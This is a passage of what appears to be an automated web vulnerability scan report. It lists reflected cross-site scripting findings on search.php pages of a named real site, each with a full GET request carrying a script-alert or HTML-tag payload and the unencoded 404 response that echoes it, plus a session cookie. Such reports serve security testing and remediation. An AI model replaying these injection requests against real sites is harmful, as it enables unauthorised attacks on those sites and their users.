X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes225b2<script>alert(1)</script>94868ef74b0/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5344. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f1411<script>alert(1)</script>282f7b514e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmosf1411<script>alert(1)</script>282f7b514e0/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmosf1411<script>alert(1)</script>282f7b514e0/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5345. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b5fb3<script>alert(1)</script>a2c0dc27408 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/imagesb5fb3<script>alert(1)</script>a2c0dc27408/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/imagesb5fb3<script>alert(1)</script>a2c0dc27408/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5346. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9a5a2<script>alert(1)</script>f5363e39275 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php9a5a2<script>alert(1)</script>f5363e39275?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/search.php9a5a2<script>alert(1)</script>f5363e39275?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5347. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 70218<a>63dbae0a5c8 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search70218<a>63dbae0a5c8&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search70218<a>63dbae0a5c8&opt=2 was not found on this server.</p>
...[SNIP]...

2.5348. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ff1db<a>e4669b8c73d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...ff1db<a>e4669b8c73d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...ff1db<a>e4669b8c73d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5349. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 42078<script>alert(1)</script>be48b46c2fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&42078<script>alert(1)</script>be48b46c2fc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&42078<script>alert(1)</script>be48b46c2fc=1 was not found on this server.</p>
...[SNIP]...

2.5350. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload dc2c5<a>9b4503bfaf1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2dc2c5<a>9b4503bfaf1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2dc2c5<a>9b4503bfaf1 was not found on this server.</p>
...[SNIP]...

2.5351. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78f0a<script>alert(1)</script>b1f86acdaef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service78f0a<script>alert(1)</script>b1f86acdaef/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service78f0a<script>alert(1)</script>b1f86acdaef/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5352. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b518b<script>alert(1)</script>0586e1f6fdf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scriptsb518b<script>alert(1)</script>0586e1f6fdf/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scriptsb518b<script>alert(1)</script>0586e1f6fdf/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5353. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1d8df<script>alert(1)</script>503270f0f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes1d8df<script>alert(1)</script>503270f0f2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes1d8df<script>alert(1)</script>503270f0f2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5354. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 870fa<script>alert(1)</script>68c517c1429 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos870fa<script>alert(1)</script>68c517c1429/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos870fa<script>alert(1)</script>68c517c1429/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5355. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 67359<script>alert(1)</script>ad2f4a7de4f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/search.php67359<script>alert(1)</script>ad2f4a7de4f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/search.php67359<script>alert(1)</script>ad2f4a7de4f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5356. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fae15<a>f42aa35b73a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Searchfae15<a>f42aa35b73a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Searchfae15<a>f42aa35b73a&opt=2 was not found on this server.</p>
...[SNIP]...

2.5357. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload eac2d<a>afeb678f030 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/search.php?keyword=search...eac2d<a>afeb678f030&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/search.php?keyword=search...eac2d<a>afeb678f030&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5358. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 92ecd<script>alert(1)</script>eb9335bfcdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&92ecd<script>alert(1)</script>eb9335bfcdb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&92ecd<script>alert(1)</script>eb9335bfcdb=1 was not found on this server.</p>
...[SNIP]...

2.5359. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e0955<a>377391e46cb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2e0955<a>377391e46cb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2e0955<a>377391e46cb was not found on this server.</p>
...[SNIP]...

2.5360. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/software-scripts/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98758<script>alert(1)</script>f711038e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. REST URL parameter 1 is the first path segment (web-service). The sink is the server's custom 404 page, which writes the requested URI into the text of a <p> element without HTML encoding, so any path segment or query-string parameter that produces a 404 is reflected the same way. Because every 404-based entry against this host reflects through that one template, the fix is a single change (HTML-encode the request URI in the 404 page, or stop echoing it) rather than per-parameter validation.

Request

GET /web-service98758<script>alert(1)</script>f711038e3/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
